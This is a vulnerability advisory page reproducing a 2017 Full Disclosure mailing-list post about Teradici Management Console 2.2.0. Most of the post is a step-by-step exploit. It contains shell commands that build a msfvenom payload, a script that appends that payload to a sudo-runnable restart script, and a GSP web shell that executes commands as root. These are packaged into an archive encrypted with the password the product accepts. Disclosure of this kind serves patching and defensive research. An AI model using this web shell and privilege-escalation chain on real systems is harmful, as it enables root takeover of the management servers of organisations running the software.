Headline
CVE-2017-20121: Full Disclosure: Teradici Management Console 2.2.0
A vulnerability was found in Teradici Management Console 2.2.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Database Management. The manipulation leads to improper privilege management. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used.
Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev
Full Disclosure mailing list archives****Teradici Management Console 2.2.0 - Privilege Escalation
From: Harrison Neal <hneal () whatdidibreak com>
Date: Wed, 22 Feb 2017 08:26:18 +0000
# Exploit Title: Teradici Management Console 2.2.0 - Web Shell Upload and Privilege Escalation
Date: February 22nd, 2017
Exploit Author: hantwister
Vendor Homepage:
http://www.teradici.com/products-and-solutions/pcoip-products/management-console
Software Link:
https://techsupport.teradici.com/ics/support/DLRedirect.asp?fileID=63583 (login required)
Version: 2.2.0
Users that can access the Settings > Database Management page can achieve code execution as root on older versions of PCoIP MC 2.x. (Based on CentOS 7 x64)
Web Shell Upload Vulnerability Overview
Database archives are extracted under /opt/jetty/tmpdeploy. By creating a malicious archive with a malicious web script that extracts to the known directory /opt/jetty/tmpdeploy/jetty-0.0.0.0-8080-console.war-_console-any- it is possible to add or modify class files and XML files pertaining to the application.
Privilege Escalation Vulnerability Overview
The jetty user owns the file /opt/jetty/jetty_self_restart.sh, and the same user has sudo rights to run that file without a password. By manipulating this file, arbitrary code can be run as root.
Exploiting The Vulnerabilities
alice:~$ mkdir -p runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images alice:~$ cd runasroot alice:~/runasroot$ msfvenom (snip) > evil alice:~/runasroot$ chmod a+x evil alice:~/runasroot$ nano modify_self_restart.sh
#!/bin/bash echo /tmp/evil >> /opt/jetty/jetty_self_restart.sh
alice:~/runasroot$ chmod a+x modify_self_restart.sh alice:~/runasroot$ cd jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ nano runasroot.gsp
<html> <head> <title>runasroot</title> </head> <body> <pre> <% out << "cp /opt/jetty/tmpdeploy/evil /tmp/".execute().text %> <% out << "/opt/jetty/tmpdeploy/modify_self_restart.sh".execute().text %> <% out << "sudo /opt/jetty/jetty_self_restart.sh".execute().text %> </pre> </body> </html>
alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ cd …/…/… alice:~/runasroot$ tar -zcf runasroot.tar.gz evil modify_self_restart.sh jetty-0.0.0.0-8080-console.war-_console-any- alice:~/runasroot$ openssl enc -e -aes-256-cbc -salt -in runasroot.tar.gz -out runasroot.archive -pass pass:4400Dominion -p
Now, choose to upload runasroot.archive through the Database Management page. An error will be displayed that it wasn’t a valid archive. Now, navigate to https://IP/console/images/runasroot.gsp
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Teradici Management Console 2.2.0 - Privilege Escalation Harrison Neal (Feb 22)
- <Possible follow-ups>
- Re: Teradici Management Console 2.2.0 - Privilege Escalation Jack Cha (Feb 28)